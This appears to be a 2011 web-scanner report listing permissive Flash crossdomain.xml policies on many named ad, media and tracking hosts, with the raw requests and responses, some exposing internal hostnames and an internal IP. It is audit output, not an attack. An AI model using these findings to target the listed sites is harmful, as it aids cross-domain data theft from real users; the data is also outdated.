HTTP/1.0 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 07-May-2011 21:06:49 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/xml <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: img.mediaplex.com |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 21:50:15 GMT Server: Apache Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT ETag: "1b1f-c7-45e6d21e5d800" Accept-Ranges: bytes Content-Length: 199 Keep-Alive: timeout=5 Connection: Keep-Alive Content-Type: text/x-cross-domain <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://img.widgets.video |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: img.widgets.video.s-msn |
HTTP/1.0 200 OK Cache-Control: max-age=86400 Content-Type: text/xml Accept-Ranges: bytes ETag: "0514ecae5f2cb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Content-Length: 170 Age: 83571 Date: Fri, 06 May 2011 19:30:36 GMT Last-Modified: Mon, 04 Apr 2011 16:31:46 GMT Expires: Fri, 06 May 2011 20:17:45 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*"/> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://int.teracent.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: int.teracent.net |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"373-1302740221000" Last-Modified: Thu, 14 Apr 2011 00:17:01 GMT Content-Type: application/xml Content-Length: 373 Date: Sat, 07 May 2011 01:50:38 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3 <sit ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://m.adnxs.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: m.adnxs.com |
HTTP/1.0 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 07-May-2011 20:02:54 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/xml <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://media.fastclick |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: media.fastclick.net |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:33:38 GMT Server: Apache/2.2.4 (Unix) P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV' Content-Length: 202 Keep-Alive: timeout=5, max=19936 Connection: Keep-Alive Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nba.scout.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: nba.scout.com |
HTTP/1.1 200 OK Content-Length: 222 Content-Type: text/xml Content-Location: http://nba.scout.com Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT Accept-Ranges: bytes ETag: "01f3482dc3fcb1:10e3" Server: Microsoft-IIS/6.0 Server: Market X-Powered-By: ASP.NET Date: Fri, 06 May 2011 19:30:41 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ne.wac.edgecastcdn |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ne.wac.edgecastcdn.net |
HTTP/1.0 200 OK Accept-Ranges: bytes Content-Type: text/xml Date: Sat, 07 May 2011 01:21:59 GMT Last-Modified: Tue, 08 Mar 2011 05:43:20 GMT Server: ECS (dca/532A) Content-Length: 203 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://now.eloqua.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: now.eloqua.com |
HTTP/1.1 200 OK Cache-Control: max-age=0 Content-Type: text/xml Last-Modified: Tue, 26 May 2009 19:46:00 GMT Accept-Ranges: bytes ETag: "04c37983adec91:0" Server: Microsoft-IIS/7.5 P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA", X-Powered-By: ASP.NET Date: Sat, 07 May 2011 01:24:04 GMT Connection: keep-alive Content-Length: 206 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-p ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://om.expedia.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: om.expedia.com |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:33:41 GMT Server: Omniture DC/2.0.0 xserver: www170 Content-Length: 93 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" secure="false" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://p.addthis.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: p.addthis.com |
HTTP/1.0 200 OK Server: IM BidManager Date: Sat, 07 May 2011 01:17:47 GMT Content-Type: text/plain Content-Length: 81 <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://pix04.revsci.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pix04.revsci.net |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: application/xml Date: Fri, 06 May 2011 22:33:37 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- allow Flash 7+ players to invoke JS from this server --> <cross-domain-po ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://rad.msn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: rad.msn.com |
HTTP/1.1 200 OK Cache-Control: max-age=604800 Content-Type: text/xml Last-Modified: Thu, 14 Apr 2011 22:28:48 GMT Accept-Ranges: bytes ETag: "0d09952f3facb1:0" Server: Microsoft-IIS/7.5 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Access-Control-Allow Date: Fri, 06 May 2011 19:30:47 GMT Connection: keep-alive Content-Length: 202 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://recruiting.scout |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: recruiting.scout.com |
HTTP/1.1 200 OK Content-Length: 222 Content-Type: text/xml Content-Location: http://recruiting.scout Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT Accept-Ranges: bytes ETag: "01f3482dc3fcb1:c34" Server: Microsoft-IIS/6.0 Server: Static1 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 21:41:57 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://scouthoops.scout |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: scouthoops.scout.com |
HTTP/1.1 200 OK Content-Length: 222 Content-Type: text/xml Content-Location: http://scouthoops.scout Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT Accept-Ranges: bytes ETag: "01f3482dc3fcb1:68c" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Server: Pike Date: Fri, 06 May 2011 19:30:37 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://search.twitter.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: search.twitter.com |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:50:27 GMT Server: hi Last-Modified: Tue, 25 Jan 2011 18:04:15 GMT Cache-Control: max-age=1800 Expires: Sat, 07 May 2011 02:12:14 GMT Content-Type: application/xml Content-Length: 206 Vary: Accept-Encoding X-Varnish: 1396483138 1396421936 Age: 493 Via: 1.1 varnish X-Cache-Svr: smf1-acz-03-sr1.prod X-Cache: HIT X-Cache-Hits: 1 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-po ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://secure-us |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: secure-us.imrworldwide |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:50:40 GMT Server: Apache Cache-Control: max-age=604800 Expires: Sat, 14 May 2011 01:50:40 GMT Last-Modified: Wed, 14 May 2008 01:55:09 GMT ETag: "10c-482a467d" Accept-Ranges: bytes Content-Length: 268 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> <site-control permi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://segment-pixel |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: segment-pixel.invitemedia |
HTTP/1.0 200 OK Server: IM BidManager Date: Fri, 06 May 2011 19:11:33 GMT Content-Type: text/plain Content-Length: 81 <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://spe.atdmt.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: spe.atdmt.com |
HTTP/1.0 200 OK Content-Type: text/xml Content-Length: 207 Allow: GET Expires: Sat, 14 May 2011 11:02:59 GMT Date: Sat, 07 May 2011 11:30:17 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-po ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tags.bluekai.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: tags.bluekai.com |
HTTP/1.0 200 OK Date: Fri, 06 May 2011 22:33:16 GMT Last-Modified: Mon, 07 Mar 2011 20:46:41 GMT ETag: "a30498-ca-49dea97c4ae40" Accept-Ranges: bytes Content-Length: 202 Content-Type: text/xml Connection: close <cross-domain-policy> <allow-access-from domain="*" to-ports="*"/> <site-control permitted-cross-domain <allow-http-request </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tours.sapha.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: tours.sapha.com |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:05:28 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Fri, 31 Oct 2008 21:10:10 GMT ETag: "d3080a5-140-5bff080" Accept-Ranges: bytes Content-Length: 320 Vary: Accept-Encoding,User Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://va.px.invitemedia |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: va.px.invitemedia.com |
HTTP/1.0 200 OK Server: IM BidManager Date: Sat, 07 May 2011 01:20:11 GMT Content-Type: text/plain Content-Length: 81 <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.scout.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.scout.com |
HTTP/1.1 200 OK Content-Length: 222 Content-Type: text/xml Content-Location: http://www.scout.com Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT Accept-Ranges: bytes ETag: "01f3482dc3fcb1:10e3" Server: Microsoft-IIS/6.0 Server: Market X-Powered-By: ASP.NET Date: Fri, 06 May 2011 19:29:11 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www2.sesamestats |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www2.sesamestats.com |
HTTP/1.0 200 OK Pragma: "No-Cache" Content-Length: 268 Content-Type: text/xml Last-Modified: Fri, 12 Sep 2008 17:47:54 GMT Accept-Ranges: bytes ETag: "3a3269afff14c91:6cc" Server: Microsoft-IIS/6.0 p3p: CP="NOI DSP CURa ADMa DEVa TAIa PSAa IVAi OUR BUS IND UNI COM NAV" X-Powered-By: ASP.NET Date: Fri, 06 May 2011 22:33:34 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> <site-control permi ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://edge.sharethis.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: edge.sharethis.com |
HTTP/1.0 200 OK Server: Apache/2.2.14 (Ubuntu) Last-Modified: Fri, 06 May 2011 17:23:38 GMT ETag: "30106-14a-4a29ec0155a80" Content-Type: application/xml Date: Sat, 07 May 2011 01:21:32 GMT Content-Length: 330 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.meandmybadself.com" /> <allow-access-from domain="*.sharethis.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://expedia.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: expedia.com |
HTTP/1.1 200 OK Content-Length: 1950 Content-Type: text/xml Last-Modified: Tue, 27 Apr 2010 20:20:24 GMT Accept-Ranges: bytes ETag: "0b4401147e6ca1:0" Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Date: Fri, 06 May 2011 22:33:31 GMT Connection: close ...<?xml version="1.0" ?> <!DOCTYPE cross-domain-policy> <cross-domain-policy> <allow-access-from domain="*.expedia.ca" secure="true" /> <allow-access-from domain="*.expedia.co.uk" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.com" secure="true" /> ...[SNIP]... <allow-access-from domain="content.expedia.com" secure="true" /> ...[SNIP]... <allow-access-from domain="ads.expedia.com" secure="true" /> ...[SNIP]... <allow-access-from domain="media.expedia.com" secure="true" /> ...[SNIP]... <allow-access-from domain="www.expedia.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.com.au" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.com.jp" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.de" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.fr" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.it" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.nl" secure="true" /> ...[SNIP]... <allow-access-from domain=" www.expediacorporate.com" secure="true"/> ...[SNIP]... <allow-access-from domain="expediacorporate.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*expediacorporate.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.hotels.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.hotwire.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.tripadvisor.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.wwte.ca" secure="true" /> ...[SNIP]... <allow-access-from domain="*.wwte1.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.wwte4.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.wwte5.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.wwte7.com" secure="true" /> ...[SNIP]... <allow-access-from domain="labadssrv01" secure="true" /> ...[SNIP]... <allow-access-from domain="labadsol01" secure="true" /> ...[SNIP]... <allow-access-from domain="10.95.1.5" secure="true" /> ...[SNIP]... <allow-access-from domain="belwaweb01" secure="true" /> ...[SNIP]... <allow-access-from domain="*.unicast.com" secure="true" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: googleads.g.doubleclick |
HTTP/1.0 200 OK P3P: policyref="http:/ Content-Type: text/x-cross-domain Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Fri, 06 May 2011 16:06:51 GMT Expires: Sat, 07 May 2011 16:06:51 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 14510 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="maps.gstatic.com" /> <allow-access-from domain="maps.gstatic.cn" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.google.com" /> <allow-access-from domain="*.google.ae" /> <allow-access-from domain="*.google.at" /> <allow-access-from domain="*.google.be" /> <allow-access-from domain="*.google.ca" /> <allow-access-from domain="*.google.ch" /> <allow-access-from domain="*.google.cn" /> <allow-access-from domain="*.google.co.il" /> <allow-access-from domain="*.google.co.in" /> <allow-access-from domain="*.google.co.jp" /> <allow-access-from domain="*.google.co.kr" /> <allow-access-from domain="*.google.co.nz" /> <allow-access-from domain="*.google.co.sk" /> <allow-access-from domain="*.google.co.uk" /> <allow-access-from domain="*.google.co.ve" /> <allow-access-from domain="*.google.co.za" /> <allow-access-from domain="*.google.com.ar" /> <allow-access-from domain="*.google.com.au" /> <allow-access-from domain="*.google.com.br" /> <allow-access-from domain="*.google.com.gr" /> <allow-access-from domain="*.google.com.hk" /> <allow-access-from domain="*.google.com.ly" /> <allow-access-from domain="*.google.com.mx" /> <allow-access-from domain="*.google.com.my" /> <allow-access-from domain="*.google.com.pe" /> <allow-access-from domain="*.google.com.ph" /> <allow-access-from domain="*.google.com.pk" /> <allow-access-from domain="*.google.com.ru" /> <allow-access-from domain="*.google.com.sg" /> <allow-access-from domain="*.google.com.tr" /> <allow-access-from domain="*.google.com.tw" /> <allow-access-from domain="*.google.com.ua" /> <allow-access-from domain="*.google.com.vn" /> <allow-access-from domain="*.google.de" /> <allow-access-from domain="*.google.dk" /> <allow-access-from domain="*.google.es" /> <allow-access-from domain="*.google.fi" /> <allow-access-from domain="*.google.fr" /> <allow-access-from domain="*.google.it" /> <allow-access-from domain="*.google.lt" /> <allow-access-from domain="*.google.lv" /> <allow-access-from domain="*.google.nl" /> <allow-access-from domain="*.google.no" /> <allow-access-from domain="*.google.pl" /> <allow-access-from domain="*.google.pt" /> <allow-access-from domain="*.google.ro" /> <allow-access-from domain="*.google.se" /> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="*.ytimg.com" /> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.doubleclick.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://static.ak.fbcdn |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: static.ak.fbcdn.net |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain X-FB-Server: 10.30.147.196 X-Cnection: close Date: Fri, 06 May 2011 22:33:53 GMT Content-Length: 1473 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="s-static.facebook.com" /> <allow-access-from domain="static.facebook.com" /> <allow-access-from domain="static.api.ak.facebook <allow-access-from domain="*.static.ak.facebook.com" /> <allow-access-from domain="s-static.thefacebook.com" /> <allow-access-from domain="static.thefacebook.com" /> <allow-access-from domain="static.api.ak.thefacebook <allow-access-from domain="*.static.ak.thefacebook <allow-access-from domain="*.static.ak.fbcdn.com" /> <allow-access-from domain="s-static.ak.fbcdn.net" /> <allow-access-from domain="*.static.ak.fbcdn.net" /> <allow-access-from domain="s-static.ak.facebook.com" /> <allow-access-from domain="www.facebook.com" /> <allow-access-from domain="www.new.facebook.com" /> <allow-access-from domain="register.facebook.com" /> <allow-access-from domain="login.facebook.com" /> <allow-access-from domain="ssl.facebook.com" /> <allow-access-from domain="secure.facebook.com" /> <allow-access-from domain="ssl.new.facebook.com" /> ...[SNIP]... <allow-access-from domain="fvr.facebook.com" /> <allow-access-from domain="www.latest.facebook.com" /> <allow-access-from domain="www.inyour.facebook.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://suth.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: suth.com |
HTTP/1.1 200 OK Content-Length: 335 Content-Type: text/xml Last-Modified: Mon, 04 Oct 2010 02:51:14 GMT Accept-Ranges: bytes ETag: "d8efc226f63cb1:1ad01" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 21:55:17 GMT Connection: close ...<?xml version="1.0" encoding="utf-8"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.suth.com" secure="false" /> <allow-access-from domain="*.co.uk" secure="false" /> ...[SNIP]... <allow-access-from domain="*.sutherlandglobal.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://w.sharethis.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: w.sharethis.com |
HTTP/1.0 200 OK Server: Apache/2.2.14 (Ubuntu) Last-Modified: Fri, 06 May 2011 17:23:38 GMT ETag: "30106-14a-4a29ec0155a80" Content-Type: application/xml Date: Sat, 07 May 2011 01:19:19 GMT Content-Length: 330 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.meandmybadself.com" /> <allow-access-from domain="*.sharethis.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.advancedaccess |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.advancedaccess.com |
HTTP/1.1 200 OK Connection: close Date: Fri, 06 May 2011 18:39:47 GMT Content-Length: 353 Content-Type: text/xml Last-Modified: Wed, 11 Feb 2009 18:21:27 GMT Accept-Ranges: bytes ETag: "edf188e758cc91:586" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="http://www.advancedaccess <allow-access-from domain="*.com" /> <allow-access-from domain="http://office.advanc ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.expedia.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.expedia.com |
HTTP/1.0 200 OK Content-Length: 1950 Content-Type: text/xml Last-Modified: Tue, 27 Apr 2010 20:20:24 GMT Accept-Ranges: bytes ETag: "0b4401147e6ca1:0" Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Date: Fri, 06 May 2011 22:33:31 GMT Connection: close ...<?xml version="1.0" ?> <!DOCTYPE cross-domain-policy> <cross-domain-policy> <allow-access-from domain="*.expedia.ca" secure="true" /> <allow-access-from domain="*.expedia.co.uk" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.com" secure="true" /> ...[SNIP]... <allow-access-from domain="content.expedia.com" secure="true" /> ...[SNIP]... <allow-access-from domain="ads.expedia.com" secure="true" /> ...[SNIP]... <allow-access-from domain="media.expedia.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.com.au" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.com.jp" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.de" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.fr" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.it" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.nl" secure="true" /> ...[SNIP]... <allow-access-from domain=" www.expediacorporate.com" secure="true"/> ...[SNIP]... <allow-access-from domain="expediacorporate.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*expediacorporate.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.hotels.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.hotwire.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.tripadvisor.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.wwte.ca" secure="true" /> ...[SNIP]... <allow-access-from domain="*.wwte1.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.wwte4.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.wwte5.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.wwte7.com" secure="true" /> ...[SNIP]... <allow-access-from domain="labadssrv01" secure="true" /> ...[SNIP]... <allow-access-from domain="labadsol01" secure="true" /> ...[SNIP]... <allow-access-from domain="10.95.1.5" secure="true" /> ...[SNIP]... <allow-access-from domain="belwaweb01" secure="true" /> ...[SNIP]... <allow-access-from domain="*.unicast.com" secure="true" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://www.expedia.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.expedia.com |
HTTP/1.0 200 OK Content-Length: 1950 Content-Type: text/xml Last-Modified: Tue, 27 Apr 2010 20:20:24 GMT Accept-Ranges: bytes ETag: "0b4401147e6ca1:0" Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Date: Fri, 06 May 2011 22:40:52 GMT Connection: close ...<?xml version="1.0" ?> <!DOCTYPE cross-domain-policy> <cross-domain-policy> <allow-access-from domain="*.expedia.ca" secure="true" /> <allow-access-from domain="*.expedia.co.uk" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.com" secure="true" /> ...[SNIP]... <allow-access-from domain="content.expedia.com" secure="true" /> ...[SNIP]... <allow-access-from domain="ads.expedia.com" secure="true" /> ...[SNIP]... <allow-access-from domain="media.expedia.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.com.au" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.com.jp" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.de" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.fr" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.it" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.nl" secure="true" /> ...[SNIP]... <allow-access-from domain=" www.expediacorporate.com" secure="true"/> ...[SNIP]... <allow-access-from domain="expediacorporate.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*expediacorporate.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.hotels.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.hotwire.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.tripadvisor.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.wwte.ca" secure="true" /> ...[SNIP]... <allow-access-from domain="*.wwte1.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.wwte4.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.wwte5.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.wwte7.com" secure="true" /> ...[SNIP]... <allow-access-from domain="labadssrv01" secure="true" /> ...[SNIP]... <allow-access-from domain="labadsol01" secure="true" /> ...[SNIP]... <allow-access-from domain="10.95.1.5" secure="true" /> ...[SNIP]... <allow-access-from domain="belwaweb01" secure="true" /> ...[SNIP]... <allow-access-from domain="*.unicast.com" secure="true" /> ...[SNIP]... |
Severity: | Low |
